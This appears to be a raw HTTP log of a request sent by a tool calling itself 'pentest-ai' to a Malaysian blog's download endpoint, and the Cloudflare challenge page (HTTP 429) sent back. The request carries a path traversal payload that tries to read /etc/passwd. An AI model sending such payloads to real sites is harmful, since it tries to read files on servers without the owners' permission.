REQUEST:
GET https://my.myfirst.tech/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?path=..%2F..%2F..%2F..%2Fetc%2Fpasswd
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:31:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9673
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c83b975db0a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=NnsjeidOGgKmMgyr4hbJOftjNhGjj4zGmKHVhcx%2F%2BtGtwvTwQa7wSwIsdpK2te9XAivcxdo%2B5opECGUPDZ0Ie%2FOPThZx124W6TAz%2BQN2xfBZOAYs%2BfFDR%2BtlxL%2BXRmFxpQ%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c83b975db0a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'SgN2RpmiGeH.y_CLYs87N04hPsM0yn.yJ04XWO26WUE-1784280677-1.2.1.1-e1Yay.OGI1zZgTWUj_WmWIGEGvzZSRfDNHNpgMD_uhGVzxzNuSe8m07n2uRte4yx',cITimeS: '1784280677',cRay: 'a1c83b975db0a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?path=..%2F..%2F..%2F..%2Fetc%2Fpasswd\u0026__cf_chl_tk=M8xy30OgXCAXFl9W6jpZPKjOdohF7sV2_Cq2TDZMfYI-1784280677-1.0.1.1-aIEIXJjfPdan9qffaH0Y9xuv1ttx2GphIamNR9RLGOU",cvId: '3',cZone: 'my.myfirst.tech',fa:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?path=..%2F..%2F..%2F..%2Fetc%2Fpasswd\u0026__cf_chl_f_tk=M8xy30OgXCAXFl9W6jpZPKjOdohF7sV2_Cq2TDZMfYI-1784280677-1.0.1.1-aIEIXJjfPdan9qffaH0Y9xuv1ttx2GphIamNR9RLGOU",md: '2p73rZKWXd55YWdH64TWnLyLEmX8.AanpPd4tK.yZTA-1784280677-1.2.1.1-DUfP6roSPeyVZrTrwjpeXJwTwv3mNDE3H.JuJTCbZI1HnvZAeTF4KCGt_iNZPfW5toGhXkkQafGq9dnKt9GVybetrhcXLQZqEfnaQqW8y.CdA8H2.hLReaPnMk6cyoy4CSXf.X55iJjfw4wK0DdQituhV9QMVG4CJXgn3ICM.oAzqx2Q.aZoqHMMfLUvuBQbbL78JA4._0Y3lBrkLDDWsXLlCuckahhSoWO7obTsvIXmMl9upHhX4O_EqtmPs_WQuQgo9aVhtP5L_MmEGbYcVIuIfCntK2l2iFN74RAjLTXvbEGvEx0Byolui4ZOdP2sXlbaq9mdiT2dGT5GU2nxcROHb4cjYIPM0nXVnH4EmPNoIwag5fk9nnxdt.Un.MP_kW3LXFd.49JTfHkXzXoSyQbeTobXozXkUl372W7.K6S1.nBmaEqUjI6wAsxxK1cHE54p3dFCK24tCIpadswilPS.Zu2FWZQWd9XPIdjh4H3pLRSyQ58S9tesoYvKlOCwfn4Ofjw8tS6uTnHeTbyc6VDhHjcFJOnk6o7Fr2dNoSjVvi7pwlIFzNJDXSBwp1Rh4JeqtHHn_eX20t6aEGyVU5hIswv_080GBsatk.GXWTGL8KkvJzAi1LErX4bL9gkQ8xxckwjmzD2maYf29wE1yYK9njq134SIV1ISufwY1hfz4SkoQjGISeaJ.2uA6E7SeMsRNtWGy5kbkJN6r7ad7ldyVdd7qOKbxLnGeOyXTCkiwE3Wdf.3BAL_A3vzKkTH_.IZP_7Uiy1yMLrMC5FunD.pRxCAoVXl.9_GIFwZUM6gziHDlhoJfR_ZR_Y2idvlBnmnp89i9va6blMO2vbVJGTckedJspJ.5K3BGihHSsX9G1GyJRTheEeaPnandRJby8iQXzmSC.irZ7zyYnCBToj8YSBmACxVKzpKbilXCJZtkGYfvk2fFCoerpxl8PaCEYRyAO8MVu.P8_JeiJmwBW4UBoCDLbbB1Q3pyDdS1HBwGJ55jN_3_daJZDwZb3cNyU3.sAY69xLSdyoIXvm4aGn7W4XRpYbuW74sbLeqSNqjNxKcs.t0_dgxMTCuJMqQjoBEFh0HZCwkRU0.VRYxae_FqjeVk_1GlfZ9g_SnB9g9Sy.NBndHoHPNLBxRbG3ZKxHE3fYajndc6TlA_I4r_0.4Hq22LdW3Y.1ERKHRRauVLlG8GsqNb6rGZ.4OUBn8sjNyyalpacV4xzjcuw6TfaHHjq1LjNApg62DXT3HNXlFC849ZRE.1IgW1qq7OI_AkykwxvEWPW0hR.Uk3TOasQ',mdrd: 'Oc67IyrFoyZE3.Hrtf5CzfMVhRdqfu9idrug.gh.Tjs-1784280677-1.2.1.1-WseWeZJB.jB9OMpRo8APjKUz12wq6xNOMTJiBSUCcaCBFqhRzoHCXf9uhafme_pCyhX_MWlZzOstxnkdVybiZRZNQZjfdiq.71a6dL8njCBw4anW2eoFbEDW4wq3C0aOIY3bClWczO6uwLK42pomJvRk1K_FAC8yim.BT9t9vsBsDqa7VRRPANxa1d3yVwHECas3F5mMka_PfpNn1GLbC.YeTEIiBrkZByLj4UclcyjaTKI_S9l80sFlV73wjxuL',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c83b975db0a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?path=..%2F..%2F..%2F..%2Fetc%2Fpasswd\u0026__cf_chl_rt_tk=M8xy30OgXCAXFl9W6jpZPKjOdohF7sV2_Cq2TDZMfYI-1784280677-1.0.1.1-aIEIXJjfPdan9qffaH0Y9xuv1ttx2GphIamNR9RLGOU"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
